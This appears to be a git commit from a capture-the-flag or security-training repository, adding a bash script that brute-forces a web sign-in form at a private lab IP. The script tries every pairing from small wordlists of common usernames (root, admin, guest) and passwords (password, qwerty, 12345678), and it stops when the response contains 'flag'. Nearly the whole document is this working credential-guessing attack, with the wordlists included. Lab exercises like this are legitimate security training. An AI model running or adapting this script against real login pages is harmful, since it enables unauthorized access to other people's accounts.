add bruteforce script

Admin_sql_injection/ressources/bruteforce.sh

@@ -0,0 +1,16 @@
+
+test_url() {
+	echo "test user $1, pass $2"
+	curl "http://10.12.248.148/?page=signin&username=$1&Login=Login&password=$2" 2> /dev/null | grep -i flag
+	if [ $? -eq 0 ]; then
+		echo "FOUND"
+		exit
+	fi
+}
+
+while read -r username; do
+	while read -r password; do
+		test_url "$username" "$password"
+	done < passwords.txt
+done < usernames.txt
+

Admin_sql_injection/ressources/passwords.txt

@@ -0,0 +1,7 @@
+password
+password1
+qwerty
+12345678
+shadow
+admin
+111111

Admin_sql_injection/ressources/usernames.txt

@@ -0,0 +1,6 @@
+root
+admin
+test
+guest
+info
+adm